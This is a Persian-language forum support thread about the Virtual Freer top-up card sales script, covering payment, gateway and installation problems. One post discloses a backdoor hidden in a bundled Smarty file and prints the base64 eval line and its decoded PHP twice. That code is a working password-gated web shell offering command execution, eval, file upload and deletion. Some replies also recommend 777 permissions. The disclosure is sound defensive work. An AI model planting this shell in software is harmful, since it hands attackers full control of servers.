-
پاسخ : اسکریپت رایگان فروش کارتهای شارژ و محصولات مجازی Virtual Freer
-
1 فایل پیوست
سلام
دوستان یه مشکل جدید و عجیب دیدم در فریر
مشتری میاد برای خرید و خرید و انجام میده و یوزر هم بهش داده میشه ولی در قسمت پرداخت ها چک که میکنم میبینم ایمیل پرداخت کننده خالی هست
فایل پیوست 29546
کسی میدونه مشکل چی هست ؟؟؟؟؟؟
- - - Updated - - -
نقل قول:
نوشته اصلی توسط
ata3929
سلام
مشتری میاد برای خرید و خرید و انجام میده و یوزر هم بهش داده میشه ولی در قسمت پرداخت ها چک که میکنم میبینم ایمیل پرداخت کننده خالی هست
فایل پیوست 29546
دوستان کسی نمیدونه مشکل چی میتونه باشه ؟!!
-
نقل قول:
نوشته اصلی توسط
ata3929
سلام
فایل پیوست 29546
- - - Updated - - -
دوستان کسی نمیدونه مشکل چی میتونه باشه ؟!!
موبایل هم خالی است ؟
فریر برای خرید نیاز به موبایل یا ایمیل دارد .
-
نقل قول:
نوشته اصلی توسط
us12
موبایل هم خالی است ؟
فریر برای خرید نیاز به موبایل یا ایمیل دارد .
فیلد موبایل و از فریر خیلی وقته برداشتم و کار میکرد به درستی و هیچ مشکلی هم نداشت
مشکل اینجاس که الان بعضی ها میان خرید میکنن خرید هم به ایمیل اونها ارسال میشه ولی فریر اونو ثبت نمیکنه و مانند عکس که گذاشتم فیلد ایمیل خالی هست
-
نقل قول:
نوشته اصلی توسط
ata3929
فیلد موبایل و از فریر خیلی وقته برداشتم و کار میکرد به درستی و هیچ مشکلی هم نداشت
مشکل اینجاس که الان بعضی ها میان خرید میکنن خرید هم به ایمیل اونها ارسال میشه ولی فریر اونو ثبت نمیکنه و مانند عکس که گذاشتم فیلد ایمیل خالی هست
یه دونه دامپ تست کنید ببینید دیگه :|
-
نقل قول:
نوشته اصلی توسط
ms313
یه دونه دامپ تست کنید ببینید دیگه :|
متوجه نشدم دوست عزیز
منظورتون چی هست ؟!!!
-
وقتی داده ها رو می خواهید تو دیتابیس ثبت کنید بررسی کنید داده ها رو ببنید اصلا به طرف سرور ارسال میشه یا نه .
-
نقل قول:
نوشته اصلی توسط
ms313
وقتی داده ها رو می خواهید تو دیتابیس ثبت کنید بررسی کنید داده ها رو ببنید اصلا به طرف سرور ارسال میشه یا نه .
بررسی کردم
خرید هایی که این مشکل و دارن در دیتابیس هم ثبت نشده است
میرم دستی در دیتابیس فیلد ایمیل و وارد میکنم در داخل پنل مدیریت فریر نشون میده
-
سلام
چند وقت پیش هنگام بررسی اسکریپت virtual freer(فروش کارت شارژ یا ...) متوجه 1 حفره در این اسکریپت شدم.
با این حفره برنامه نویس این اسکریپت به راحتی می تونه هرکاری بخواد بکنه !
مشکل از فایل virtual_freer_v1.58\include\libs\smarty\sysplugins \smarty_internal_templateparser.php هستش که انتهای این فایل این کد افزوده شده:
کد PHP:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ 0KCk7DQokYmxhY2s9JzhmNzU4YmNhZWNmMjkxMDllOGQzMGVhYmJkZGEzOWU2JzsNCmlmKG1kNSgkX1J FUVVFU1RbJ2JsYWNrJ10pPT0kYmxhY2sgb3IgJF9TRVNTSU9OWydsb2dpbiddPT0nMScpew0KJF9TRVN TSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhbCddKXtldmFsKCRfUkVRVUVTVFsnZXZ hbCddKTt9aWYoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y3dkKCkuRElSRUNUT1JZX1NFUEFSQVR PUi4kX1JFUVVFU1RbJ2RsJ10pO30NCmlmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywgMCwgMykpID0 9ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfUkVRVUVTVFsnYWQnXTsNCmlmICgkYWQ pe2NoZGlyKCRhZCk7fWVsc2V7JGFkPWdldGN3ZCgpO31pZiAoJF9GSUxFU1siZmYiXSl7bW92ZV91cGx vYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZmIl1bIm5hbWUiXSk 7fQ0KaWYgKCRociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmID0gcmVhZGRpcigkaHIpKXtpZihpc19 kaXIoJGYpKXskZGY9JGRmLiRmLicNCic7fWVsc2V7JGxmPSRsZi4kZi4nDQonO319Y2xvc2VkaXIoJGh yKTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0Pic7ZWNobyAnPGNlbnRlcj48dGV4dGF yZWEgY29scz05MCByb3dzPTIwPic7aWYoJF9HRVRbJ2NtZSddKXtwYXNzdGhydSgkX0dFVFsnY21lJ10 pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90ZXh0YXJlYT4nLiRmb3JtLidDaGFuZ2UgRGlyIDo gPGlucHV0IG5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3ZCgpLiRzLic+PGlucHV0IHR5cGU9c3V ibWl0IHZhbHVlPUdvPjwvZm9ybT4nLiRmb3JtLidDb21tYW5kIEV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1 jbWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPWVYZWN1dGU+PC9mb3J tPjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+VXB sb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxlIG5hbWU9ZmYgPiA8aW5wdXQgdHlwZT1oaWRkZW4 gbmFtZT1hZCB2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPVNlbmQ+PC9 mb3JtPic7DQp9')); ?>
خوب کد رو دیکد می کنیم:
کد PHP:
error_reporting(0);
set_magic_quotes_runtime(0);
session_start();
$black='8f758bcaecf29109e8d30eabbdda39e6';
if(md5($_REQUEST['black'])==$black or $_SESSION['login']=='1'){
$_SESSION['login']='1';
if($_REQUEST['eval']){eval($_REQUEST['eval']);}if($_REQUEST['dl']){unlink(getcwd().DIRECTORY_SEPARATOR.$_REQUEST['dl']);}
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";}else{$s="/";}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);}$form='<form action="" method=get>';echo '<center><textarea cols=90 rows=20>';if($_GET['cme']){passthru($_GET['cme']);}else{echo $df.$lf;};echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'><input type=submit value=Go></form>'.$form.'Command Execute : <input name=cme size=50 value=id> <input type=submit value=eXecute></form><form action="" method=post enctype=multipart/form-data>Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'><input type=submit value=Send></form>';
}
برای رفعش تنها کافیه این تیکه کد رو حذف کنید.
منبع : http://forum.iranphp.org/Thread-%D9%...-virtual-freer
-
نقل قول:
نوشته اصلی توسط
eYounes
سلام
چند وقت پیش هنگام بررسی اسکریپت virtual freer(فروش کارت شارژ یا ...) متوجه 1 حفره در این اسکریپت شدم.
با این حفره برنامه نویس این اسکریپت به راحتی می تونه هرکاری بخواد بکنه !
مشکل از فایل virtual_freer_v1.58\include\libs\smarty\sysplugins \smarty_internal_templateparser.php هستش که انتهای این فایل این کد افزوده شده:
کد PHP:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ 0KCk7DQokYmxhY2s9JzhmNzU4YmNhZWNmMjkxMDllOGQzMGVhYmJkZGEzOWU2JzsNCmlmKG1kNSgkX1J FUVVFU1RbJ2JsYWNrJ10pPT0kYmxhY2sgb3IgJF9TRVNTSU9OWydsb2dpbiddPT0nMScpew0KJF9TRVN TSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhbCddKXtldmFsKCRfUkVRVUVTVFsnZXZ hbCddKTt9aWYoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y3dkKCkuRElSRUNUT1JZX1NFUEFSQVR PUi4kX1JFUVVFU1RbJ2RsJ10pO30NCmlmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywgMCwgMykpID0 9ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfUkVRVUVTVFsnYWQnXTsNCmlmICgkYWQ pe2NoZGlyKCRhZCk7fWVsc2V7JGFkPWdldGN3ZCgpO31pZiAoJF9GSUxFU1siZmYiXSl7bW92ZV91cGx vYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZmIl1bIm5hbWUiXSk 7fQ0KaWYgKCRociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmID0gcmVhZGRpcigkaHIpKXtpZihpc19 kaXIoJGYpKXskZGY9JGRmLiRmLicNCic7fWVsc2V7JGxmPSRsZi4kZi4nDQonO319Y2xvc2VkaXIoJGh yKTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0Pic7ZWNobyAnPGNlbnRlcj48dGV4dGF yZWEgY29scz05MCByb3dzPTIwPic7aWYoJF9HRVRbJ2NtZSddKXtwYXNzdGhydSgkX0dFVFsnY21lJ10 pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90ZXh0YXJlYT4nLiRmb3JtLidDaGFuZ2UgRGlyIDo gPGlucHV0IG5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3ZCgpLiRzLic+PGlucHV0IHR5cGU9c3V ibWl0IHZhbHVlPUdvPjwvZm9ybT4nLiRmb3JtLidDb21tYW5kIEV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1 jbWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPWVYZWN1dGU+PC9mb3J tPjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+VXB sb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxlIG5hbWU9ZmYgPiA8aW5wdXQgdHlwZT1oaWRkZW4 gbmFtZT1hZCB2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPVNlbmQ+PC9 mb3JtPic7DQp9')); ?>
خوب کد رو دیکد می کنیم:
کد PHP:
error_reporting(0);
set_magic_quotes_runtime(0);
session_start();
$black='8f758bcaecf29109e8d30eabbdda39e6';
if(md5($_REQUEST['black'])==$black or $_SESSION['login']=='1'){
$_SESSION['login']='1';
if($_REQUEST['eval']){eval($_REQUEST['eval']);}if($_REQUEST['dl']){unlink(getcwd().DIRECTORY_SEPARATOR.$_REQUEST['dl']);}
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";}else{$s="/";}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);}$form='<form action="" method=get>';echo '<center><textarea cols=90 rows=20>';if($_GET['cme']){passthru($_GET['cme']);}else{echo $df.$lf;};echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'><input type=submit value=Go></form>'.$form.'Command Execute : <input name=cme size=50 value=id> <input type=submit value=eXecute></form><form action="" method=post enctype=multipart/form-data>Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'><input type=submit value=Send></form>';
}
برای رفعش تنها کافیه این تیکه کد رو حذف کنید.
منبع :
http://forum.iranphp.org/Thread-%D9%...-virtual-freer
من بررسی کردم
همچین چیزی نداره
-
1 فایل پیوست
فایل پیوست 29558دوست عزیز بنده چک کردم همچین چیزی وجود دارد
-
1 فایل پیوست
با درود
من از اسکریپت فرییر نسخه 1.57 استفاده میکنم. از پلاگ این parspal موجود در سایت پارس پال و هم نسخه سایت فرییر استفاده کردم. در هر دو حالت پس از پرداخت موفقیت امیز و انتقال به سایت خودم با این خطا مواجه میشم
آدرس بازگشت بروزر :
http://dukandiet.biz/callback.php?gateway=parspal
خطا :
Not Found
The requested URL /callback.php?gateway=parspal was not found on this server.
dukandiet.biz
مشکل از کجاست؟#-o
متشکرم
-
نقل قول:
نوشته اصلی توسط
saeedsm
با درود
من از اسکریپت فرییر نسخه 1.57 استفاده میکنم. از پلاگ این parspal موجود در سایت پارس پال و هم نسخه سایت فرییر استفاده کردم. در هر دو حالت پس از پرداخت موفقیت امیز و انتقال به سایت خودم با این خطا مواجه میشم
آدرس بازگشت بروزر :
خطا :
Not Found
dukandiet.biz
مشکل از کجاست؟#-o
متشکرم
سلام و احترام
دوست عزیز ماژول درگاه دیگری را نصب و تست بفرمایید ،در صورتی که مشکلی نداشته باشد یعنی مشکل از ماژول است
-
نقل قول:
نوشته اصلی توسط
javad159
سلام و احترام
دوست عزیز ماژول درگاه دیگری را نصب و تست بفرمایید ،در صورتی که مشکلی نداشته باشد یعنی مشکل از ماژول است
سلام
همون ماژول روی ۱.۵۸ کار کرد. من از ۱.۵۷ استفاده میکردم چون ظاهرا میگن استیبل تره؟
متشکرم
-
نقل قول:
نوشته اصلی توسط
saeedsm
سلام
همون ماژول روی ۱.۵۸ کار کرد. من از ۱.۵۷ استفاده میکردم چون ظاهرا میگن استیبل تره؟
متشکرم
پس مشکل از اسکریپت بوده دوست عزیز
مشکلتون حل شده ؟
-
نقل قول:
نوشته اصلی توسط
saeedsm
با درود
آدرس بازگشت بروزر :
خطا :
Not Found
dukandiet.biz
مشکل از کجاست؟#-o
متشکرم
آدرس سایت را در فایل کانفیگ درست کنید
فریر شما در این آدرس نصب است :
http://dukandiet.biz/fre/
-
با سلام:
لطفا یکی از دوستان میتونه مشکل منو رو برطرف کنه
آدرس سایت
www.id.tatmobile.ir
نقل قول:
نوشته اصلی توسط
kargah
دیتا دارید تو دیتابیس !؟
چه تغییراتی ایجاد کردین !؟
-
نقل قول:
نوشته اصلی توسط
kargah
فایل index.php دیفالت را جایگزین کنید
-
سلام
من هم خیلی مشکلات داشتم با فریر ولی از وقتی ورژن php سرویسم رو قرار دادن روی 4 مشکلاتم حل شده و راحت جواب میده
-
نقل قول:
نوشته اصلی توسط
ms313
دیتا دارید تو دیتابیس !؟
چه تغییراتی ایجاد کردین !؟
هیچ تغییراتی ایجاد نکردم دیتا ساختم و فایل رو اکسترکت کردم و حالا می خوام نصب کنم خطا میده
- - - Updated - - -
نقل قول:
نوشته اصلی توسط
MOJTABA005
فایل index.php دیفالت را جایگزین کنید
فایل دیفالت هست و من هیچ دستکاری نکردم
-
نقل قول:
نوشته اصلی توسط
kargah
هیچ تغییراتی ایجاد نکردم دیتا ساختم و فایل رو اکسترکت کردم و حالا می خوام نصب کنم خطا میده
- - - Updated - - -
فایل دیفالت هست و من هیچ دستکاری نکردم
فایل ها رو از سایت اصلی فریر دانلود کردید ؟
-
نقل قول:
نوشته اصلی توسط
MOJTABA005
فایل ها رو از سایت اصلی فریر دانلود کردید ؟
آره چندین بار دانلود کردم
-
با بنده در ارتباط باشید
براتون نصب کنم
آیدی یاهو : info.luxserver
آدرس سایت : Plus-server.ir
-
در هنگام نصب freer با پیغام خطای cannot open file مواجه میشوم
یعنی به محظ اینکه کلیک می کنم نصب بشه و sql دیتابیس رو بخونه اینو می نویسه و البته اطلاعات دیتابیس چندین بار بررسی شده دقیقا اعمال میشه
نصب نمیشه
پنل دایرکت ادمین هست
ورژن لینوکس 6.7 سنتوس
فایل ها رو از سایت اصلی فریر دانلود کردم
ورژن php 5.4
اطلاعات دیگه لازم بود بفرمایید بگم مرسی
-
نقل قول:
نوشته اصلی توسط
unix_magnet
یعنی به محظ اینکه کلیک می کنم نصب بشه و sql دیتابیس رو بخونه اینو می نویسه و البته اطلاعات دیتابیس چندین بار بررسی شده دقیقا اعمال میشه
نصب نمیشه
پنل دایرکت ادمین هست
ورژن لینوکس 6.7 سنتوس
ورژن php 5.4
سلام و احترام
چک کنید ببینید فایل ها درست و کامل آپلود شده اند ؟!
-
نقل قول:
نوشته اصلی توسط
unix_magnet
نصب نمیشه
پنل دایرکت ادمین هست
ورژن لینوکس 6.7 سنتوس
ورژن php 5.4
سلام. اول ورزن 5.3 باشه بهتره
در ضمن این خطا فقط در دایرکت ادیمن نشون داده میشه. چون سطح دسترسی چند پوشه رو باید تغییر بدی
اول تو مسیرزیر statics\upload\images\
دو پوشه resized و cache رو 777 بزار
پوشه install و فایل های داخلش هم 777 بزار
داخل پوشه templates پوشه templates_c رو هم 777 بزار درست میشه صد درصد
- - - Updated - - -
-
نقل قول:
نوشته اصلی توسط
mo_mohit1
در ضمن این خطا فقط در دایرکت ادیمن نشون داده میشه. چون سطح دسترسی چند پوشه رو باید تغییر بدی
دو پوشه resized و cache رو 775 بزار
پوشه install و فایل های داخلش هم 775 بزار
داخل پوشه templates پوشه templates_c رو هم 775 بزار درست میشه صد درصد
- - - Updated - - -
دو پوشه resized و cache رو 775 بزار
پوشه install و فایل های داخلش هم 775 بزار
داخل پوشه templates پوشه templates_c رو هم 775 بزار درست میشه صد درصد
مشکل از دایرکت ادمین نیست دوست عزیز مشکل از کانفیگ سرور است ، بنده بر روی ورژن 5.4 در حال استفاده ام بدون کوچکترین مشکلی .مشکل از suphp می باشد که احتمالن در سرور فعال نیست .
-
نقل قول:
نوشته اصلی توسط
javad159
مشکل از دایرکت ادمین نیست دوست عزیز مشکل از کانفیگ سرور است ، بنده بر روی ورژن 5.4 در حال استفاده ام بدون کوچکترین مشکلی .مشکل از suphp می باشد که احتمالن در سرور فعال نیست .
شما تست کنید. بنده در این تاپیک با این روش کار صد نفر.و راه انداختم/اگر با اایرکت ادمین اشنا یاشید این خطاهای پرمیشن داخلش عادی هست. با این روش که گفتم صد درصد حل مییشه/ لطفا تست کنید .و بعد نظر بدین /هیچ ربطی به بد آپلود شدن و کانفیگ سرور نداره/.
-
نقل قول:
نوشته اصلی توسط
mo_mohit1
شما تست کنید. بنده در این تاپیک با این روش کار صد نفر.و راه انداختم/اگر با اایرکت ادمین اشنا یاشید این خطاهای پرمیشن داخلش عادی هست. با این روش که گفتم صد درصد حل مییشه/ لطفا تست کنید .و بعد نظر بدین /هیچ ربطی به بد آپلود شدن و کانفیگ سرور نداره/.
مگه شده ادم با directadmin کار بکنه و این مشکل premission ها دردسر ساز نشه
تمامی پوشه ها بنا به فرمایش شما دقیقا تو همون سطح دسترسی بودن اما بنده پوشه ها رو از public_html به سطح 777 رسوندم و اوکی شد البته بعدش خوب باید کمی وقت صرف بشه بابت برگردوندن فایلها به روال سابق سطح دسترسی شون
با این حال حدس شما درست بود و بنده بابت این مسئله از شما سپاسگذاری می کنم
از دوست دیگرمون که هدفشون کمک بود هم قدردانی می کنم
ممنون و موفق باشید
- - - Updated - - -
باید اطلاعیه های روی سایت behpardakht.com را هم روی کد خود اجرا کنید تا فعال شوید. (لوگوی بهپرداخت + آدرس شاپرک + لوگوی اینماد)
قرار دادن لوگوی اینماد یا لوگوی به پرداخت ربطی به رویت درگاه بانک ندارد کاری است که توسط برنامه نویس سایت انجام شود.
باز هم اگر ابهامی هست به برنامه نویس اطلاع دهید تا با شماره 27312734 تماس بگیرد تا فنی صحبت شود.
این دقیقا منظورش چیه ؟ لوگو کجا باید قرار داده بشه دقیقا ؟ توی صفحه اصلی سایت رو می گه یا یه چیز دیگه منظورشه ؟
-
سلام دوستان لطفا راهنمایی کنید این ماژول لیست اکانتهای پایان یافته فریر عملکردش چطور هست به ibsng متصل میشه یا جداگونه کار می کنه ؟
-
نقل قول:
نوشته اصلی توسط
MOJTABA005
با بنده در ارتباط باشید
براتون نصب کنم
آیدی یاهو : info.luxserver
آدرس سایت : Plus-server.ir
سلام من ایمیل زدم دوست عزیز
شماره واتس و تلگرام من
09383606541
-
نقل قول:
نوشته اصلی توسط
salaripoor
سلام دوستان لطفا راهنمایی کنید این ماژول لیست اکانتهای پایان یافته فریر عملکردش چطور هست به ibsng متصل میشه یا جداگونه کار می کنه ؟
درود
بله به ibsng متصل میشه
- - - Updated - - -
نقل قول:
نوشته اصلی توسط
kargah
سلام من ایمیل زدم دوست عزیز
شماره واتس و تلگرام من
09383606541
پاسختون ارسال شد